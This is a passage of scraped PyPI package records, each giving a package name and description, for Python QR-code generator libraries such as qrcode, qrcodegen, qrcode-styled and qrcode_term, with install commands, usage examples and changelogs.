\"10.5281/zenodo.7545620\" --color \"#070\" --style qrcode --type pdfCitationCite this project viahttps://doi.org/10.5281/zenodo.7545620:LicenseThis work is licensed under aCreative Commons Attribution-ShareAlike 4.0 International License.Follow me onMastodon."} +{"package": "qrcode", "pacakge-description": "Pure python QR Code generatorGenerate QR codes.A standard install usespypngto generate PNG files and can also render QR\ncodes directly to the console. A standard install is just:pip install qrcodeFor more image functionality, install qrcode with thepildependency so\nthatpillowis installed and can be used for generating images:pip install \"qrcode[pil]\"What is a QR Code?A Quick Response code is a two-dimensional pictographic code used for its fast\nreadability and comparatively large storage capacity. The code consists of\nblack modules arranged in a square pattern on a white background. The\ninformation encoded can be made up of any kind of data (e.g., binary,\nalphanumeric, or Kanji symbols)UsageFrom the command line, use the installedqrscript:qr \"Some text\" > test.pngOr in Python, use themakeshortcut function:importqrcodeimg=qrcode.make('Some data here')type(img)# qrcode.image.pil.PilImageimg.save(\"some_file.png\")Advanced UsageFor more control, use theQRCodeclass. 
For example:importqrcodeqr=qrcode.QRCode(version=1,error_correction=qrcode.constants.ERROR_CORRECT_L,box_size=10,border=4,)qr.add_data('Some data')qr.make(fit=True)img=qr.make_image(fill_color=\"black\",back_color=\"white\")Theversionparameter is an integer from 1 to 40 that controls the size of\nthe QR Code (the smallest, version 1, is a 21x21 matrix).\nSet toNoneand use thefitparameter when making the code to determine\nthis automatically.fill_colorandback_colorcan change the background and the painting\ncolor of the QR, when using the default image factory. Both parameters accept\nRGB color tuples.img=qr.make_image(back_color=(255,195,235),fill_color=(55,95,35))Theerror_correctionparameter controls the error correction used for the\nQR Code. The following four constants are made available on theqrcodepackage:ERROR_CORRECT_LAbout 7% or less errors can be corrected.ERROR_CORRECT_M(default)About 15% or less errors can be corrected.ERROR_CORRECT_QAbout 25% or less errors can be corrected.ERROR_CORRECT_H.About 30% or less errors can be corrected.Thebox_sizeparameter controls how many pixels each \u201cbox\u201d of the QR code\nis.Theborderparameter controls how many boxes thick the border should be\n(the default is 4, which is the minimum according to the specs).Other image factoriesYou can encode as SVG, or use a new pure Python image processor to encode to\nPNG images.The Python examples below use themakeshortcut. The sameimage_factorykeyword argument is a valid option for theQRCodeclass for more advanced\nusage.SVGYou can create the entire SVG or an SVG fragment. When building an entire SVG\nimage, you can use the factory that combines as a path (recommended, and\ndefault for the script) or a factory that creates a simple set of rectangles.From your command line:qr --factory=svg-path \"Some text\" > test.svg\nqr --factory=svg \"Some text\" > test.svg\nqr --factory=svg-fragment \"Some text\" > test.svgOr in Python:importqrcodeimportqrcode.image.svgifmethod=='basic':# Simple factory, just a set of rects.factory=qrcode.image.svg.SvgImageelifmethod=='fragment':# Fragment factory (also just a set of rects)factory=qrcode.image.svg.SvgFragmentImageelse:# Combined path factory, fixes white space that may occur when zoomingfactory=qrcode.image.svg.SvgPathImageimg=qrcode.make('Some data here',image_factory=factory)Two other related factories are available that work the same, but also fill the\nbackground of the SVG with white:qrcode.image.svg.SvgFillImage\nqrcode.image.svg.SvgPathFillImageTheQRCode.make_image()method forwards additional keyword arguments to the\nunderlying ElementTree XML library. This helps to fine tune the root element of\nthe resulting SVG:importqrcodeqr=qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathImage)qr.add_data('Some data')qr.make(fit=True)img=qr.make_image(attrib={'class':'some-css-class'})You can convert the SVG image into strings using theto_string()method.\nAdditional keyword arguments are forwarded to ElementTreestostring():img.to_string(encoding='unicode')Pure Python PNGIf Pillow is not installed, the default image factory will be a pure Python PNG\nencoder that usespypng.You can use the factory explicitly from your command line:qr --factory=png \"Some text\" > test.pngOr in Python:importqrcodefromqrcode.image.pureimportPyPNGImageimg=qrcode.make('Some data here',image_factory=PyPNGImage)Styled ImageWorks only withversions>=7.2 (SVG styled images require 7.4).To apply styles to the QRCode, use theStyledPilImageor one of the\nstandardSVGimage factories. 
These accept an optionalmodule_drawerparameter to control the shape of the QR Code.These QR Codes are not guaranteed to work with all readers, so do some\nexperimentation and set the error correction to high (especially if embedding\nan image).Other PIL module drawers:For SVGs, useSvgSquareDrawer,SvgCircleDrawer,SvgPathSquareDrawer, orSvgPathCircleDrawer.These all accept asize_ratioargument which allows for \u201cgapped\u201d squares or\ncircles by reducing this less than the default ofDecimal(1).TheStyledPilImageadditionally accepts an optionalcolor_maskparameter to change the colors of the QR Code, and an optionalembeded_image_pathto embed an image in the center of the code.Other color masks:Here is a code example to draw a QR code with rounded corners, radial gradient\nand an embedded image:importqrcodefromqrcode.image.styledpilimportStyledPilImagefromqrcode.image.styles.moduledrawers.pilimportRoundedModuleDrawerfromqrcode.image.styles.colormasksimportRadialGradiantColorMaskqr=qrcode.QRCode(error_correction=qrcode.constants.ERROR_CORRECT_L)qr.add_data('Some data')img_1=qr.make_image(image_factory=StyledPilImage,module_drawer=RoundedModuleDrawer())img_2=qr.make_image(image_factory=StyledPilImage,color_mask=RadialGradiantColorMask())img_3=qr.make_image(image_factory=StyledPilImage,embeded_image_path=\"/path/to/image.png\")ExamplesGet the text content fromprint_ascii:importioimportqrcodeqr=qrcode.QRCode()qr.add_data(\"Some text\")f=io.StringIO()qr.print_ascii(out=f)f.seek(0)print(f.read())Theadd_datamethod will append data to the current QR object. To add new data by replacing previous content in the same object, first use clear method:importqrcodeqr=qrcode.QRCode()qr.add_data('Some data')img=qr.make_image()qr.clear()qr.add_data('New data')other_img=qr.make_image()Pipe ascii output to text file in command line:qr --ascii \"Some data\" > \"test.txt\"\ncat test.txtAlternative to piping output to file to avoid PowerShell issues:# qr \"Some data\" > test.png\nqr --output=test.png \"Some data\"Change log7.4.2 (6 February 2023)Allowpypngfactory to allow for saving to a string (likeqr.save(\"some_file.png\")) in addition to file-like objects.7.4.1 (3 February 2023)Fix bad over-optimization in v7.4 that broke large QR codes. Thanks to\nmattiasj-axis!7.4 (1 February 2023)Restructure the factory drawers, allowing different shapes in SVG image\nfactories as well.Add a--factory-draweroption to theqrconsole script.Optimize the output for theSVGPathImagefactory (more than 30% reduction\nin file sizes).Add apypngimage factory as a pure Python PNG solution. 
Ifpillowisnotinstalled, then this becomes the default factory.Thepymagingimage factory has been removed, but its factory shortcut and\nthe actual PymagingImage factory class now just link to the PyPNGImage\nfactory.7.3.1 (1 October 2021)Improvements for embedded image.7.3 (19 August 2021)Skip color mask if QR is black and white7.2 (19 July 2021)Add Styled PIL image factory, allowing different color masks and shapes in QR codesSmall performance inprovementAdd check for border size parameter7.1 (1 July 2021)Add \u2013ascii parameter to command line interface allowing to output ascii when stdout is pipedAdd \u2013output parameter to command line interface to specify output fileAccept RGB tuples in fill_color and back_colorAdd to_string method to SVG imagesReplace inline styles with SVG attributes to avoid CSP issuesAdd Python3.10 to supported versions7.0 (29 June 2021)Drop Python < 3.6 support.6.1 (14 January 2019)Fix short chunks of data not being optimized to the correct mode.Tests fixed for Python 36.0 (23 March 2018)Fix optimize length being ignored inQRCode.add_data.Better calculation of the best mask pattern and related optimizations. Big\nthanks to cryptogun!5.3 (18 May 2016)Fix incomplete block table for QR version 15. Thanks Rodrigo Queiro for the\nreport and Jacob Welsh for the investigation and fix.Avoid unnecessary dependency for non MS platforms, thanks to Noah Vesely.MakeBaseImage.get_image()actually work.5.2 (25 Jan 2016)Add--error-correctionoption to qr script.Fix script piping to stdout in Python 3 and reading non-UTF-8 characters in\nPython 3.Fix script piping in Windows.Add some useful behind-the-curtain methods for tinkerers.Fix terminal output when using Python 2.6Fix terminal output to display correctly on MS command line.5.2.1Small fix to terminal output in Python 3 (and fix tests)5.2.2Revert some terminal changes from 5.2 that broke Python 3\u2019s real life tty\ncode generation and introduce a better way from Jacob Welsh.5.1 (22 Oct 2014)Makeqrscript work in Windows. Thanks Ionel Cristian M\u0103rie\u0219Fixed print_ascii function in Python 3.Out-of-bounds code version numbers are handled more consistently with a\nValueError.Much better test coverage (now only officially supporting Python 2.6+)5.0 (17 Jun 2014)Speed optimizations.Change the output when using theqrscript to use ASCII rather than\njust colors, better using the terminal real estate.Fix a bug in passing bytecode data directly when in Python 3.Substation speed optimizations to best-fit algorithm (thanks Jacob Welsh!).Introduce aprint_asciimethod and use it as the default for theqrscript rather thanprint_tty.5.0.1Update version numbers correctly.4.0 (4 Sep 2013)Made qrcode work on Python 2.4 - Thanks tcely.\nNote: officially, qrcode only supports 2.5+.Support pure-python PNG generation (via pymaging) for Python 2.6+ \u2013 thanks\nAdam Wisniewski!SVG image generation now supports alternate sizing (the default box size of\n10 == 1mm per rectangle).SVG path image generation allows cleaner SVG output by combining all QR rects\ninto a single path. Thank you, Viktor St\u00edskala.Added some extra simple SVG factories that fill the background white.4.0.1Fix the pymaging backend not able to save the image to a buffer. 
Thanks ilj!4.0.2Fix incorrect regex causing a comma to be considered part of the alphanumeric\nset.Switch to using setuptools for setup.py.4.0.3Fix bad QR code generation due to the regex comma fix in version 4.0.2.4.0.4Bad version number for previous hotfix release.3.1 (12 Aug 2013)Important fixes for incorrect matches of the alphanumeric encoding mode.\nPreviously, the pattern would match if a single line was alphanumeric only\n(even if others wern\u2019t). Also, the two characters{and}had snuck\nin as valid characters. Thanks to Eran Tromer for the report and fix.Optimized chunking \u2013 if the parts of the data stream can be encoded more\nefficiently, the data will be split into chunks of the most efficient modes.3.1.1Update change log to contain version 3.1 changes. :PGive theqrscript an--optimizeargument to control the chunk\noptimization setting.3.0 (25 Jun 2013)Python 3 support.Add QRCode.get_matrix, an easy way to get the matrix array of a QR code\nincluding the border. Thanks Hugh Rawlinson.Add in a workaround so that Python 2.6 users can use SVG generation (they\nmust installlxml).Some initial tests! And tox support (pip install tox) for testing across\nPython platforms.2.7 (5 Mar 2013)Fix incorrect termination padding.2.6 (2 Apr 2013)Fix the first four columns incorrectly shifted by one. Thanks to Josep\nG\u00f3mez-Suay for the report and fix.Fix strings within 4 bits of the QR version limit being incorrectly\nterminated. Thanks to zhjie231 for the report.2.5 (12 Mar 2013)The PilImage wrapper is more transparent - you can use any methods or\nattributes available to the underlying PIL Image instance.Fixed the first column of the QR Code coming up empty! Thanks to BecoKo.2.5.1Fix installation error on Windows.2.4 (23 Apr 2012)Use a pluggable backend system for generating images, thanks to Branko \u010cibej!\nComes with PIL and SVG backends built in.2.4.1Fix a packaging issue2.4.2Added ashowmethod to the PIL image wrapper so therun_examplefunction actually works.2.3 (29 Jan 2012)When adding data, auto-select the more efficient encoding methods for numbers\nand alphanumeric data (KANJI still not supported).2.3.1Encode unicode to utf-8 bytestrings when adding data to a QRCode.2.2 (18 Jan 2012)Fixed tty output to work on both white and black backgrounds.Addedborderparameter to allow customizing of the number of boxes used to\ncreate the border of the QR code2.1 (17 Jan 2012)Added aqrscript which can be used to output a qr code to the tty using\nbackground colors, or to a file via a pipe."} +{"package": "qrcodeapi", "pacakge-description": "QRCodeAPIQRCodeAPI is a Python library designed to seamlessly interact with the QR code generation API\nfromqrcode.ness.su. 
Leveraging FastAPI and aiohttp, it provides a convenient and asynchronous\nexperience for generating QR codes.FeaturesSimplicity: Generate QR codes with a simple and intuitive interface.Customization: Fine-tune QR code parameters, including data encoding, border size, box size, and optional image\ninclusion.InstallationpipinstallqrcodeapiUsageimportasynciofromqrcodeapiimportQRCodeAPIasyncdefmain():# Create an instance of QRCodeAPIqrcode_api=QRCodeAPI()# Example: Generate a basic QR code and save it to a filedata=\"Hello, QR Code!\"filename=\"qrcode.png\"qr_code_image=awaitqrcode_api.create(data)withopen(filename,\"wb\")asf:f.write(qr_code_image)# Example: Generate a QR code with an image and save it to a filedata_with_image=\"Example Data\"image_url=\"https://example.com/logo.png\"filename_with_image=\"qrcode_with_image.png\"qr_code_image_with_image=awaitqrcode_api.create(data_with_image,border=5,box_size=40,image_url=image_url,image_round=20,image_padding=5,)withopen(filename_with_image,\"wb\")asf:f.write(qr_code_image_with_image)if__name__=='__main__':asyncio.run(main())LicensingQRCodeAPI is licensed under the MIT License. See theLICENSEfile for details."} +{"package": "qrcode-artistic", "pacakge-description": "ThisSegnoplugin converts a\n(Micro) QR Code to a Pillow Image or into a QR code with a background\nimage.This plugin is not required to write PNG, EPS or PDF files. Segno\u2019s native\nimplementations usually generate smaller files in less time.This plugin might be useful to modify the QR Codes (i.e. rotate or blur)\nor to save the QR codes in an image format which is not supported by Segno.Furthermore, QR codes can be created with a background image.Transparency is supported as wellUsepipto install from PyPI:$ pip install qrcode-artisticDocumentation:https://segno.readthedocs.io/en/latest/artistic-qrcodes.html"} +{"package": "qr-codec", "pacakge-description": "Encode and decode Quick Response codes."} +{"package": "qrcode-converter", "pacakge-description": "`````````````````Run it:.. code:: bash$ pip install qrcode-converter$ python app/run.py [inner_img_path] [content] [width] [height]Links`````* `website `_* `documentation `_"} +{"package": "qrcodecreator", "pacakge-description": "No description available on PyPI."} +{"package": "qrcodegen", "pacakge-description": "IntroductionThis project aims to be the best, clearest QR Code generator library. The primary goals are flexible options and absolute correctness. 
Secondary goals are compact implementation size and good documentation comments.Home page with live JavaScript demo, extensive descriptions, and competitor comparisons:https://www.nayuki.io/page/qr-code-generator-libraryFeaturesCore features:Significantly shorter code but more documentation comments compared to competing librariesSupports encoding all 40 versions (sizes) and all 4 error correction levels, as per the QR Code Model 2 standardOutput format: Raw modules/pixels of the QR symbolDetects finder-like penalty patterns more accurately than other implementationsEncodes numeric and special-alphanumeric text in less space than general textOpen-source code under the permissive MIT LicenseManual parameters:User can specify minimum and maximum version numbers allowed, then library will automatically choose smallest version in the range that fits the dataUser can specify mask pattern manually, otherwise library will automatically evaluate all 8 masks and select the optimal oneUser can specify absolute error correction level, or allow the library to boost it if it doesn\u2019t increase the version numberUser can create a list of data segments manually and add ECI segmentsMore information about QR Code technology and this library\u2019s design can be found on the project home page.Examplesfrom qrcodegen import *\n\n# Simple operation\nqr0 = QrCode.encode_text(\"Hello, world!\", QrCode.Ecc.MEDIUM)\nsvg = to_svg_str(qr0, 4) # See qrcodegen-demo\n\n# Manual operation\nsegs = QrSegment.make_segments(\"3141592653589793238462643383\")\nqr1 = QrCode.encode_segments(segs, QrCode.Ecc.HIGH, 5, 5, 2, False)\nfor y in range(qr1.get_size()):\n for x in range(qr1.get_size()):\n (... paint qr1.get_module(x, y) ...)More complete set of examples:https://github.com/nayuki/QR-Code-generator/blob/master/python/qrcodegen-demo.py."} +{"package": "qrcodegenerator", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qr-code-generator", "pacakge-description": "No description available on PyPI."} +{"package": "qr-code-generator-api", "pacakge-description": "python-qr-code-generator-apiA simple Python wrapper for the API of qr-code-generator.com, which is used to generate QR codes with certain design elements.Why this API wrapper?First of all, because I needed it and also because this API is not reallywell documented. This wrapper provides a quick and easy way to connect to the API and request images, with a minimal amount of coding or effort. Just import the module, write a couple lines of easily understandable code and start generating these amazing QR codes.Table of ContentsFeaturesConfigure to fit your own needsChange all possible QR code optionsAutomatically save QR codesUsageCommand Line InterfaceCLI ExampleUse it in your own codeExample of using it in your own codeAuthenticationEnvironment variablesHardcoded in your own codePresetsThe easiest codeLimitationsFeaturesConfigure to fit your own needsWhile we have the wrapper set up in a way that allows for quick usage of the API, we understand that sometimes you just need it to test an absurd scenario or that you want to change output folders. With the configuration file, you are the boss. Even better: you don't necessarily have to change the configuration file to work for you. If you want, you can just use code to update configuration variables and run a request. This way, your configuration is limited to your own code.Change all possible QR code optionsThis wrapper provides an easy way to update QR options. 
Just set the dictionary variable to a new value, and it will automatically be taken into account when generating a code.Automatically save QR codesThe wrapper takes the API response and automatically turns it into a saved image in the desired output location. Do we need to say more?UsageThe wrapper was developed with ease of use in mind. This means that one can either, directly call the module to perform a request, or code their own Python scripts and import the module.Command Line InterfaceTo perform a request via the command line, simply$ python3 qr_code_generatorwith flags to specify your needs. The following flags are supported:--token {api access token here} (short: -t)--load {path to yaml file to load settings from} (short: -l)--output {name for output file} (short: -o)--bulk {amount to bulk generate} (short: -b)--verbose (short -v)CLI ExampleThe following code will request 5 QR-codes for tokenapijob, with name:test-qr-and load a configuration file calledconfig.yaml. It will also log all events:$ python3 qr_code_generator --token apijob --output test-qr --bulk 5 --load config.yaml --verboseUse it in your own codeTo use the api and its settings in your code, import it with:from qr_code_generator import QrGeneratorThen create an instance of QrGenerator:api = QrGenerator()Adjust settings as you like by alteringapi.settingsandapi.options, and callapi.request()to request a QR code be generated by api.Example of using it in your own codeThe following code will request a QR-code for tokenapijob, with name:test-qr, but before that it will load a configuration file calledconfig.yaml. It will also make sure to log all events:fromqr_code_generatorimportQrGeneratorapi=QrGenerator('apijob')api.load('config.yaml')api.config['VERBOSE']=Trueapi.output_filename='test-qr'api.request()AuthenticationThere are three possible ways to authenticate with the API. Authentication is done on a token basis. A token can be generatedon this webpage. The three ways are (based from most safe to least safe, and thus least preferred):Environment variablesThe safest way to authenticate, is by using environment variables. This starts by exporting your access key to an environment variable with$ export ACCESS_TOKEN=. After this, feel free to create an instance of QrGenerator by just calling the class asapi = QrGenerator(). The token will automatically be fetched from the environment.Hardcoded in your own codeA little bit less safe, because what if you accidentally commit your code with the token in it, or what if someone finds a readable portion of your code? If you choose to go down this route, understand that there are certain risks involved, but it can be done. There are two ways to put the token in your own code.Either make sure you call the QrGenerator class with a token parameter, as such:api = QrGenerator(). This will fetch the token from your code and add it to the query.Or set it later in your code, by using the set function:QrGenerator.set('access-token', ).WhenQrGenerator.request()is called and the API token has not been set and the configuration file has not been altered, a custom Exception will be thrown:MissingRequiredParameterError. This is because the API will directly return an InvalidCredentialsError regardless. If the configuration file has been changed, you might encounter aInvalidCredentialsError. Either way, it will not work.PresetsNot everyone loves coding. 
We are currently moving more and more to a world in which nocode is the standard for big groups of people, there is a way to load settings from a yaml file to the api, without you having to do any coding. Copy the settings-template.yaml template in /templates/ to your main directory and make the necessary changes. You can change both values for options and config. They will be automatically loaded and generation will take place.You can load with the load flag (described above), but you can also call api.load(filename.yaml) to load it in your own code. This will even further reduce the amount of Python necessary to generate a QR code.The easiest codefromqr_code_generatorimportQrGeneratorapi=QrGenerator()api.load(file.yaml)api.request()LimitationsIt is currently not possible to generate bulk qr-codes in your own code, without creating your own loop. This is by design, since we want to give all users the opportunity to do with bulk generation what they wish to do. The simplest way to request 5 codes would be:fromqr_code_generatorimportQrGeneratorapi=QrGenerator()file='output-filename'foriinrange(1,6):api.output_filename=f'{file}-{i}'api.request()"} +{"package": "qrcode-img", "pacakge-description": "\u0413\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f QR Code \u043f\u043e \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0435https://pypi.org/project/qrcode-img/\u041f\u0440\u0438\u043c\u0435\u0440 \u0440\u0430\u0431\u043e\u0442\u044bfrom path import Path\nfrom qrcode_img import QRCode\n\ntext = 'Hello'\n\npath_to_download = Path().joinpath(\"example\", \"11.png\")\npath_to_save = Path().joinpath(\"example\", \"1example.png\")\n\n\nqrcode = QRCode(text)\n\nbyte_io = qrcode.gen_qr_code(path_to_download)\n\nprint(byte_io)\n\nqrcode.save_qr_code(path_to_save)"} +{"package": "qr-coder", "pacakge-description": "qrioA QR handling module for writing and reading QR.examplefromqrioimportencode,decodedata=\"hello world\"print(data==decode(encode(data.encode())).decode())"} +{"package": "qrcodes", "pacakge-description": "No description available on PyPI."} +{"package": "qrcode-song", "pacakge-description": "No description available on PyPI."} +{"package": "qrcode-styled", "pacakge-description": "WelcomeQRCode Styled[WIP]This is a python port for abrowser QRCode generatorbyDenys KozakThis project was initially created for internal use incifrazia.com.We do not intend to maintain this project for wide usage, but feel free to use it, share, edit or submit pull requests.FeaturesMultiple formats:SVG usingxmlsPNG/WEBP, etc. 
usingPillowMultiple styles:Extra rounded cornersRounded cornersStraightDottedCheck outour documentation.InstallingUsingPoetrypoetryaddqrcode-styledUsingPIPpipinstallqrcode-styledRequirementsPython>= 3.10Pillow>= 10.0qrcode>= 6.1lxml>= 8.2.0(optional, for SVG rendering)ExtrasKeywordDescriptionPackagessvgAllows you to generate SVGlxml >= 4.6.3SVGWEBp"} +{"package": "qrcodeT", "pacakge-description": "qrcodeTThis simple library generates text-based QR codes to be used directly in the console (terminal).Installationusing pip:pip install qrcodeTor directly from here:pip install git+git://github.com/Khalil-Youssefi/qrcodeT.git#egg=qrcodeTUsageYou can directly use this library to create a QR code from a text and directly print it on the console:import qrcodeT\nqrcodeT.qrcodeT('https://github.com/Khalil-Youssefi/qrcodeT')and the output will be:"} +{"package": "qrcode-term", "pacakge-description": "qrcode_termQR code generator for terminal outputScreenshotFrom a terminal:CLI> python src/qrcode_term/qrcode_term.py\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\u2588\u2580\u2580\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2584\u2580\u2588 \u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2588\u2588 \u2580\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588 \u2588\u2580\u2588\u2580\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2580\u2580\u2588\u2580\u2588 \u2580\u2580\u2580\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2584\u2584 \u2584\u2580\u2584\u2580\u2580\u2580\u2584\u2584 \u2588\u2588\u2584 \u2584\u2580\u2580\u2584 \u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2584\u2588\u2588\u2580\u2584\u2580 \u2580\u2580\u2584\u2580\u2584\u2580 \u2584\u2588\u2584\u2584\u2588\u2588\u2588\n\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2584\u2588\u2580 \u2580\u2588\u2580\u2580\u2580\u2580 \u2580\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2584 \u2584\u2588\u2580\u2580\u2588\u2584\u2588\u2588\u2588\u2584\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2584 \u2580\u2588 \u2588\u2580\u2584 \u2584 \u2584 \u2588\u2588\u2588\n\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580\u2588 \u2584\u2580\u2584\u2580\u2580\u2588\u2580\u2588\u2580\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nHello world!\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata\" 
-f5\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2584 \u2588 \u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2580\u2580\u2584\u2580\u2580\u2588 \u2588 \u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580\u2584\u2580\u2584\u2580\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2588\u2580\u2588\u2580\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2580\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588 \u2580\u2580 \u2580\u2588 \u2588 \u2588 \u2580 \u2588 \u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2584\u2588\u2584\u2580\u2584\u2580 \u2580\u2588\u2584 \u2584 \u2580 \u2584\u2588\u2588\u2580\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2588\u2584\u2584 \u2588\u2580\u2588\u2584\u2584\u2580\u2588\u2580 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588\u2580\u2580\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2588 \u2588\u2580\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2588 \u2588 \u2588\u2580\u2588\u2584 \u2588 \u2580 \u2580\u2584\u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 \u2580\u2580\u2580\u2580\u2580 \u2588\u2580 \u2580 \u2584 \u2580 \u2580\u2580\u2588 \u2580\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\u2580\nmydata\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata 2\" -f3 -i\n \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2580\u2588\u2580 \u2588 \u2584\u2584\u2584 \u2588 \n \u2588 \u2588\u2588\u2588 \u2588 \u2584\u2580\u2580\u2580\u2584 \u2588 \u2588\u2588\u2588 \u2588 \n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584 \u2584\u2580\u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2588\u2588\u2580\u2588\u2584 \u2584 \u2584\u2584\u2584 \n \u2580\u2584\u2584\u2588\u2580\u2584 \u2584\u2580\u2588 \u2580 \u2580\u2588 \u2584\u2588\u2584 \n \u2580\u2584\u2584 \u2580\u2580\u2584\u2584\u2584\u2580 \u2580 \u2584\u2584\u2584\u2588\u2584\u2580\u2580 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2588 
\u2580\u2588\u2584\u2584\u2584\u2588\u2580\u2588\u2580 \n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2580\u2588\u2588\u2580\u2584\u2588\u2580\u2588\u2580 \u2580 \n \u2588 \u2588\u2588\u2588 \u2588 \u2580 \u2588\u2580\u2580 \u2584 \u2584\u2580\u2588\u2584\u2584 \n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584\u2580\u2584\u2584 \u2580\u2580 \u2584\u2588\u2580\u2580\u2580 \n \n \nmydata 2\n\n> python src/qrcode_term/qrcode_term.py --data \"mydata 3\" -f10 